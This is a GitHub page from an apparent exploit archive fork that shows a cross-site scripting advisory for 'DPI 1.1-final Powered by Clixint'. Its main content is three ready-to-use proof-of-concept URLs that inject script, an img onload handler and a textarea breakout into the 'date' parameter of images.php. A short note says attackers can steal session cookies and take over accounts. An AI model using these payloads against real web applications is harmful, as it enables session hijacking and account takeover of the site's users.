forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10086.txt
15 lines (11 loc) · 805 Bytes
/
10086.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
DPI 1.1-final Powered by Clixint XSS
====================================
########################################################################
# Example1: http://server/path/images.php?date=%3Cscript%3Ealert(123456)%3C/script%3E
# Example2: http://server/path/images.php?date=%3Cimg+src=http://www.site.extension/path/image.gif+onload=alert(123456)%3E
# Example3: http://server/path/images.php?date=</textarea>
########################################################################
# Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable
# application to fool a user in order to gather data from them. An attacker can steal the
# session cookie and take over the account.
########################################################################